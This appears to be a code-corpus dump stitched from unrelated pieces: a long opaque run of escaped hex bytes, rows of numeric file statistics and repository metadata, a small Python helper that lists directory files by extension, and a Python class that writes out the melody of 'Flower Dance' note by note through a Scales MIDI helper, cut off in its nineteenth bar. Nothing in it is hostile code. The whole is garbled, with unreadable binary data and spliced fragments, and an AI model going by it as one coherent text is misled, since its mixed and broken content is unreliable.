\xc3\xbb\xb4\x3c\x9c\x18\x9c\xa0\x1b\xa9\x9a\x39\xa8\x3a\x08\x01\x01\xe7\x26\xec\xc6\x0d\x16\x21\x29\x11\x39\x42\x7a\x20\x92\x91\x83\x09\x1a\x8a\x29\x33\x3f\x9b\x98\xa9\xb8\x98\x21\x99\x9c\x14\x09\x1b\x39\x10\xba\x01\x01\xe8\x2f\xee\x4a\x10\x16\x21\x39\x11\x49\x52\x7a\xa8\xb9\x89\x31\x99\xa9\x99\xa1\x45\x52\x33\x62\x23\x63\x13\x73\x86\x77\x13\x64\x23\x54\x33\x44\x43\x34\x43\x34\x53\x24\x63\x14\x73\x04\x01\xe9\x27\xed\x46\xf0\x05\x21\x31\x11\x41\x4a\x7a\xb0\xd1\xbd\x1a\x19\x9a\x59\x34\x32\x35\x22\x36\x21\x77\x36\x41\x35\x51\x34\x42\x34\x43\x33\x44\x32\x45\x01\xea\x26\xd1\x46\x6e\xae\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x2d\x2e\x0f\x20\x0f\x31\x06\x01\xeb\x1b\x2d\x46\xee\xa5\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x55\x2b\x3c\x04\x01\xec\x29\x31\x47\x6e\xae\xd3\x7b\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x2d\x2e\x0f\x20\x0f\x31\x06\x01\xed\x1e\x8d\x46\xee\x9d\xb3\x7b\xa8\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x55\x2b\x3c\x04\x01\xf0\x16\xea\xbe\x0d\x15\x21\x19\x11\x29\x32\x7a\x90\xb9\xfd\x7f\x12\x33\x73\x53\x05\x01\xf4\x23\xef\x46\x50\xc6\x61\xed\xa1\x0f\xa2\x0e\x48\xca\x44\x66\x87\x67\x87\x77\x69\x79\x38\x31\x38\x41\x37\x52\x35\x73\x50\x75\x10\x02\x01\xf5\x23\xec\xc6\x0d\xbe\x49\xed\xa1\x48\x46\x0e\x26\x68\x28\xa6\xcc\xfc\x6c\x62\xa6\xe2\x62\x86\x64\x72\x52\x24\x6c\xe4\x40\xe8\x06\x00\x01\xf8\x27\xee\x4a\x70\x9e\x61\x69\xf5\x50\x93\x86\x86\x77\x07\x61\x14\x63\x14\x54\x24\x44\x34\x43\x44\x33\x44\x24\x54\x14\x64\x13\x64\x07\x71\x87\x2e\x07\x01\xf9\x15\x4b\x4a\x10\x96\x49\x51\xf5\x00\x23\x24\x13\x16\x35\x47\x56\xfe\xab\x01\x01\xfa\x2f\x91\x43\x30\xce\x71\xed\xd1\x88\x87\x44\x87\x84\xcb\xa3\x18\x27\x6e\x2c\x31\x2a\x32\x2a\x42\x38\x33\x28\x34\x28\x35\x26\x36\x76\x50\x74\x60\x24\x38\x24\x39\x22\x3a\x22\x6a\x3c\x01\xfb\x26\xec\x46\xd0\xb5\x49\xed\x01\x25\x43\x02\x43\x22\xe5\xa1\x8c\x0e\x64\xa2\x26\x57\xdd\x1c\x88\xd0\x8c\x0c\x8d\x0c\x8d\xcc\xd0\x58\x90\xd0\x0c\x01\xfc\x38\xf6\x42\xf0\xee\x79\x20\x79\x20\x79\x20\x79\xb4\x07\xb4\x07\xa4\xf5\x10\xf6\x10\x12\xf3\x00\x13\xf3\x00\x22\xe3\x32\xd3\x33\x07\x72\x42\x07\x62\x43\xc3\x07\xb3\x07\xb4\x62\xa3\x72\x93\x73\x93\x82\x07\x87\x07\x04\x01\xfd\x2f\x52\x46\xb0\xd6\x79\x00\x79\x00\x79\x00\x79\xf0\x1a\xa2\x83\x03\x91\x28\x9a\xc1\xa9\xb9\xa9\x99\x83\x83\x88\x83\x37\x83\x43\x83\x43\x74\x33\x12\x53\x11\x36\x07\x21\x54\x16\x00\x01\xfe\x30\xf1\x46\x70\xce\x71\xed\x11\x9c\xcc\x1c\xd8\x50\xd1\xd0\x91\xcc\x95\x8c\x59\x8c\x8d\x58\xcd\x58\x09\x19\x49\xd9\x4c\x99\x8c\x4d\x98\x8d\xd4\x8d\xd0\xd1\x50\xd1\x1c\xd8\x8c\x5c\x01\x01\xff\x26\x4d\x46\xf0\xbd\x51\xed\x01\x2b\x46\x0e\x46\x68\x48\x86\x28\x86\x24\x6c\x26\x4c\x46\x2c\x66\x2c\x84\x26\x88\x46\x68\x48\x0e\x46\x26\x8a\x00\x02\x00\x2e\xf1\x42\x30\x26\x09\x69\x89\xf0\x90\xf0\x08\x79\x04\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\x02\x01\x25\x4c\x46\xd0\x15\x09\x41\x89\xc8\x90\xc8\x08\x79\x18\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\x02\x02\x2c\xf1\x42\x30\x3e\x62\x53\x21\x49\x21\x79\xe8\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\x02\x03\x21\x4c\x46\xd0\x25\x3a\x2b\x21\xed\x41\x8c\x0e\x64\xa2\x26\x57\xdd\x1c\x88\xd0\x8c\x0c\x8d\x0c\x8d\xcc\xd0\x58\x90\xd0\x0c\x02\x04\x20\xeb\x4a\xd0\x05\x09\x39\x89\xc0\x90\xc0\x08\x79\x80\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\x02\x05\x1e\x4b\x46\xd0\x0d\x75\x12\x81\x21\x81\x11\xf2\x20\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\x02\x06\x1c\xeb\x4a\xd0\x15\x32\x23\x35\x42\xe2\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\x02\x07\x1c\x4b\x46\xd0\x25\x32\x23\x35\x42\xf2\x00\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\x02\x08\x14\xe7\x3e\xf0\x04\x09\x19\x89\xa0\x90\xa0\x08\xd1\xa1\xfd\xff\x0b\x00\x02\x09\x13\x47\x3e\xf0\x04\x09\x19\x89\xa0\x90\xa0\x08\xd1\xa1\xfd\x5f\x00\x02\x0a\x11\xe8\x42\xf0\x14\x1a\x0b\x21\x22\xd1\xa9\xfd\xff\x1b\x00\x02\x0b\x10\x48\x42\xf0\x14\x1a\x0b\x21\x22\xd1\xa9\xfd\xdf\x00\x02\x0c\x29\xf1\x46\x70\x26\x09\x69\x89\xf0\x90\xf0\x08\x79\xe8\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x02\x0d\x21\x4d\x46\xf0\x15\x09\x49\x89\xd0\x90\xd0\x08\x79\xb0\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x02\x0e\x27\xf1\x46\x70\x3e\x62\x53\x21\x49\x21\x79\xd8\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x02\x0f\x1f\x4d\x46\xf0\x2d\x42\x33\x21\x29\x21\x79\xa0\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x02\x10\x30\xed\x4a\x10\x0e\x95\x12\xa1\x21\xa1\x11\xf2\x30\x07\x51\x07\x33\x43\x24\x53\x23\x53\x23\x53\x23\x53\x23\x43\x33\x8b\xce\x0e\xa2\x46\x88\x66\x86\xd6\x0c\x91\x4c\x51\x8c\x4d\x8c\x11\x02\x11\x19\x49\x46\x50\x05\x09\x29\x89\xb0\x90\xb0\x08\xe1\x91\x89\x09\x8a\x22\xaa\xb1\xfd\x15\x00\x02\x12\x2f\xed\x4a\x10\x26\x42\x33\x21\x29\x21\x79\x88\x83\xa8\x83\x99\x21\x92\xa9\x91\xa9\x91\xa9\x91\xa9\x91\xa1\x99\x45\x67\x07\x51\x23\x44\x33\x43\x6b\x86\x48\xa6\x28\xc6\x26\xc6\x08\x02\x13\x15\x48\x4a\x50\x15\x1a\x0b\x21\x22\xc1\x11\x8b\x03\x19\xa2\xa9\xfd\x15\x00\x02\x14\x1b\xed\x4a\x30\x16\x09\x49\x89\xd0\x90\xd0\x08\x79\x90\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x02\x15\x17\x4b\x4a\x10\x0e\x75\x12\x81\x21\x81\x11\xe2\x53\xfe\x47\x37\x15\x16\x23\x24\x03\x02\x16\x19\xed\x4a\x30\x26\x42\x33\x21\x29\x21\x79\x88\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x02\x17\x15\x4b\x4a\x10\x26\x32\x23\x35\x42\xc2\x53\xfe\x47\x37\x15\x16\x23\x24\x03\x02\x18\x21\x6b\xc7\xab\x1d\x9b\x03\x91\x21\x89\xc1\x85\x75\x75\x76\x85\x0c\x17\x56\x4d\x1c\xc8\xdc\xc3\x0c\xae\xd4\x50\x52\x0a\x00\x02\x19\x1b\xc9\xca\xab\x15\x93\x8b\xa1\x88\x31\xaa\x9b\x23\xb3\x31\xa2\x83\x12\xf3\xb1\x75\x9a\xc9\x09\x01\x02\x1a\x13\x6f\xc3\x0b\x86\x1f\x88\x0d\xef\xff\xf7\xc0\x5b\x6b\x2c\x2d\x07\x02\x1b\x17\x28\xc7\x2b\x95\xa9\x35\x07\x07\x22\x53\xfb\xb3\x22\xda\xa9\x65\x5a\x89\xc9\x00\x02\x1e\x17\xee\x4a\x50\x1e\x21\x39\x11\x49\x52\x7a\xa0\x41\xff\xf0\xe0\x03\x43\xff\x70\x00\x02\x1f\x29\xec\x46\x10\x06\x21\x29\x11\x39\x42\x7a\xa0\xc9\x3d\xa1\x99\x30\xa9\x99\x20\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x1a\x02\x26\x2b\xd1\x42\x30\x46\x79\x00\x79\x00\x79\x14\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\x02\x27\x1f\x2c\x46\xd0\x2d\x51\xf5\x50\x46\x07\x32\x51\x93\xab\x6e\x0e\x44\x68\x46\x86\x46\x86\x46\x66\x68\x2c\x48\x68\x06\x02\x28\x1d\xeb\xca\xcd\x85\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x41\x92\xb1\x92\x72\x53\x00\x02\x29\x1b\x4b\xc6\xcd\x9d\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x99\x49\xc6\x4a\xca\x0d\x01\x02\x2a\x28\x11\x47\x70\xae\xd3\x7b\x60\x19\x51\x19\x79\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x02\x2b\x20\x6d\x46\xf0\x9d\xb3\x7b\x20\x19\x31\x19\x79\xa8\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x02\x2c\x2a\x31\x47\x70\xae\xd3\x7b\xe8\x99\xc8\x83\x48\x91\x79\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x02\x2d\x22\x8d\x46\xf0\x9d\xb3\x7b\xa8\x99\xa8\x83\x28\x91\x79\xa8\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x02\x2e\x26\xd1\x46\x70\x46\x79\x00\x79\x00\x79\xf0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x02\x2f\x1b\x2d\x46\xf0\x35\x59\xf5\x70\x65\x07\x32\x4c\xa6\x26\xe6\x7c\x37\x31\x35\x42\x43\x73\x20\x56\x04\x02\x30\x2a\x31\x47\x70\xae\xd3\x7b\x04\xf2\x00\xf2\x00\xf2\xe0\x87\x07\x54\x6c\xe8\x48\x26\x47\x26\x27\x66\xfd\x76\x62\x72\x64\x72\x84\x8e\x86\x8a\xea\x80\xf0\x0a\x00\x02\x31\x1e\x8d\x46\xf0\x9d\xb3\x7b\x38\x59\xf5\x70\x65\x07\x32\x4c\xa6\x26\xe6\x7c\x37\x31\x35\x42\x43\x73\x20\x56\x04\x02\x32\x1e\xaf\x42\x10\x9e\xc3\x7b\xa8\xc9\x89\x41\x11\x32\xa1\x31\x21\x22\xb1\x99\x31\x12\xc1\xcb\x52\xe2\xfd\x19\x00\x02\x33\x25\xad\xc2\xad\x95\xb3\x7b\x90\x41\x33\x91\x31\x91\xa9\x11\x22\xa1\x21\x21\x12\xb1\x11\xb1\x09\x39\xc3\x42\xd2\x51\x59\xd1\x51\xd1\x39\x00\x02\x50\x1d\xac\x45\xd0\x85\x19\x12\x0a\x1b\x9a\x91\xa1\x91\xa1\x91\x19\x92\x03\x99\xab\xc9\x55\x31\x07\x42\x36\x00\x02\x54\x16\xab\x45\xb0\x85\xa3\x03\x91\x28\xc2\xc9\xc1\xdd\x4d\x44\x51\x1c\xc8\x18\x01\x02\x58\x18\xab\x45\xd0\x9d\xaa\x9b\x15\x53\x12\x53\x07\x0f\x08\xd7\x4d\x44\x51\x1c\xc8\x18\x01\x02\x59\x17\xab\x45\xd0\x0d\xa3\x03\x91\x28\xc2\xc9\xc1\x83\xaf\xac\x44\x66\x66\xae\x6a\x00\x02\x5f\x15\x8a\xc2\x2c\xad\xb9\xfd\x47\x07\x21\x07\x51\x73\x9b\xc4\xcc\xdc\x54\x01\x02\x65\x11\x4b\xca\x0d\x86\x29\xff\xa3\x9b\x0a\x8b\x11\x92\xc1\x3d\x02\x75\x1b\xad\x45\xf0\xa5\xb2\x03\x19\x26\x53\x13\x73\x07\x1f\xd0\xd9\x4d\x4c\x8d\xd0\xd0\x1c\x88\x15\x01\x02\x79\x0e\xa8\x49\x50\xad\xfd\x23\x9a\x03\x09\x93\x01\x02\x87\x12\x08\x46\x30\x05\xa2\xb2\xa9\xfd\xc9\xc1\x81\xcc\xd4\x12\x00\x02\x88\x14\xaa\xc6\x2d\x95\xb9\x55\x07\x21\x07\x41\x73\xfb\x3f\x9c\x89\xb9\x2a\x02\x89\x13\xab\x49\x10\x86\x29\x5f\x1d\x7c\xe5\xe8\xa6\xc2\x62\x84\x64\x00\x02\x8c\x1b\xad\x41\xb0\x2d\x4a\x86\x76\x12\x63\x22\x63\x32\x43\x33\x43\x42\x34\x52\x23\x62\x23\x72\x76\x03\x02\x8d\x30\xb3\x41\x70\xa6\x31\xc1\x29\xba\x29\x32\x09\x21\x32\x09\x19\x09\x31\x09\x19\x11\x21\x91\x11\x45\x32\x12\x32\x42\x32\x12\x42\x22\x42\x12\x42\x22\x52\x53\x22\x52\x53\x12\x62\x63\x02\x02\x8e\x21\x4d\x42\xb0\xbd\x51\xd1\x51\x59\xd1\x51\xc2\x42\x3b\x89\x31\x91\x31\x11\x22\xa1\x21\x21\x92\xa9\x11\xb1\x11\x31\xc3\x01\x02\x9e\x20\x4c\xca\xed\x05\xaa\x09\xa2\x11\x9a\x19\x92\x99\x8a\x21\x8a\xa9\x33\x89\x29\x91\xa1\x91\x99\x25\x43\x13\x53\x93\x7b\x02\xbb\x0b\xc3\x44\xd6\x0c\x0a\x89\x03\x01\x02\xbc\x0c\xc3\x44\xd6\x84\x03\x09\x09\x0a\x00\x02\xbd\x0b\xc3\x44\xd6\x84\x03\x0a\x11\x01\x00\x00'
| 24,740.5 | 49,480 | 0.749965 | 12,370 | 49,481 | 2.999919 | 0.020857 | 0.012612 | 0.004851 | 0.005497 | 0.532108 | 0.502196 | 0.473578 | 0.453286 | 0.433561 | 0.411571 | 0 | 0.384337 | 0.00002 | 49,481 | 1 | 49,481 | 49,481 | 0.365643 | 0 | 0 | 0 | 0 | 1 | 0.999818 | 0.999818 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
575387332cfac7551ea5b0d1fe7f6fcc7ee87d72 | 746 | py | Python | BLib/Files/Search.py | Bwc9876/BLib | 41d4f794aa3878b2b5bce13da0a5eb610f4500f2 | [
"MIT"
] | null | null | null | BLib/Files/Search.py | Bwc9876/BLib | 41d4f794aa3878b2b5bce13da0a5eb610f4500f2 | [
"MIT"
] | null | null | null | BLib/Files/Search.py | Bwc9876/BLib | 41d4f794aa3878b2b5bce13da0a5eb610f4500f2 | [
"MIT"
] | null | null | null | import os
def get_files_in_dir_by_extension(directory, ext):
out = []
if not os.path.exists(directory):
raise FileNotFoundError(f"'{directory}' not found")
if os.path.isfile(directory):
raise FileNotFoundError(f"'{directory}' is a file")
for f in os.listdir(directory):
if f.endswith(f".{ext}"):
out += [os.path.join(directory, f)]
return out
def get_all_files_in_dir(directory):
out = []
if not os.path.exists(directory):
raise FileNotFoundError(f"'{directory}' not found")
if os.path.isfile(directory):
raise FileNotFoundError(f"'{directory}' is a file")
for f in os.listdir(directory):
out += [os.path.join(directory, f)]
return out
| 24.064516 | 59 | 0.634048 | 101 | 746 | 4.594059 | 0.29703 | 0.077586 | 0.267241 | 0.275862 | 0.806034 | 0.806034 | 0.806034 | 0.806034 | 0.668103 | 0.668103 | 0 | 0 | 0.231903 | 746 | 30 | 60 | 24.866667 | 0.809773 | 0 | 0 | 0.8 | 0 | 0 | 0.131367 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.05 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
93d4b2e461308f7e04b86f23580caaefa2717f56 | 73,764 | py | Python | Examples/FlowerDance/FlowerDance.py | Authey/MidiUtilHelper | c03fb47fa09af15f0ba4fa15e1bb4a04b277ec0b | [
"MIT"
] | 1 | 2020-12-30T15:07:34.000Z | 2020-12-30T15:07:34.000Z | Examples/FlowerDance/FlowerDance.py | Authey/MidiUtilHelper | c03fb47fa09af15f0ba4fa15e1bb4a04b277ec0b | [
"MIT"
] | null | null | null | Examples/FlowerDance/FlowerDance.py | Authey/MidiUtilHelper | c03fb47fa09af15f0ba4fa15e1bb4a04b277ec0b | [
"MIT"
] | 1 | 2020-12-28T21:47:26.000Z | 2020-12-28T21:47:26.000Z | # Author: Authey
# Date: 13/06/2020
from Scales import Scales
class FlowerDance:
def __init__(self):
self.name = 'Flower Dance'
self.sc = Scales(200)
def generator(self):
# -------- first bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g5(1)
self.sc.a5(2)
self.sc.modify_time(2)
# -------- second bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- third bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- fourth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# -------- fifth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g5(1)
self.sc.a5(2)
self.sc.modify_time(2)
# -------- sixth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- seventh bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- eighth bar -------- #
# ---- major ---- #
self.sc.e6(8)
self.sc.modify_time(8, 1)
self.sc.a6(8)
self.sc.modify_time(8, 1)
self.sc.c7s(8)
self.sc.modify_time(8, 1)
self.sc.e7(8)
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(8)
self.sc.modify_time(8, 1)
self.sc.e5(8)
self.sc.modify_time(8, 1)
self.sc.a5(8)
# -------- ninth bar -------- #
# ---- major ---- #
self.sc.e6(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(4, 1)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(4, 1)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(7, 1)
# ---- minor ---- #
self.sc.c5(2)
self.sc.modify_time(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(2)
# -------- tenth bar -------- #
# ---- major ---- #
self.sc.b5(1.5)
self.sc.modify_time(1.5, 1)
self.sc.d6(1.5)
self.sc.b6(0.5)
self.sc.a6(1.5)
self.sc.g6s(0.5)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.e7(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e4(1)
self.sc.b4(1)
self.sc.e5(1)
self.sc.g5s(1)
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.e5(1)
# -------- eleventh bar -------- #
# ---- major ---- #
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.e7(2)
self.sc.d7(1)
self.sc.d7(0.333)
self.sc.e7(0.333)
self.sc.d7(0.333)
self.sc.b6(1)
self.sc.g6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.c5(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.d5(1)
# -------- twelfth bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.e6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- thirteenth bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(2)
self.sc.modify_time(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(2)
# -------- fourteenth bar -------- #
# ---- major ---- #
self.sc.b5(1)
self.sc.b5(1)
self.sc.modify_time(2, 1)
self.sc.d6(1)
self.sc.g6s(1)
self.sc.a6(1)
self.sc.b6(1)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.d6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.g6(0.5)
# time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e4(1)
self.sc.b4(1)
self.sc.e5(2)
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- fifteenth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
# time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(2)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(2)
# -------- sixteenth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6s(2)
self.sc.modify_time(2)
# -------- seventeenth bar -------- #
# ---- major ---- #
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.b5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.g6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(1)
self.sc.e5(1)
self.sc.e4(1)
self.sc.b4(1)
self.sc.e5(2)
self.sc.modify_time(2, 1)
self.sc.g5(2)
# -------- eighteenth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.f6(0.5)
self.sc.c6(0.5)
self.sc.e6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(1)
self.sc.c5(1)
self.sc.c4(1)
self.sc.g4(1)
self.sc.c5(2)
self.sc.modify_time(2, 1)
self.sc.e5(2)
# -------- nineteenth bar -------- #
# ---- major ---- #
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a5(0.5)
self.sc.d6(0.5)
self.sc.a5(0.5)
self.sc.f6(0.5)
self.sc.a5(0.5)
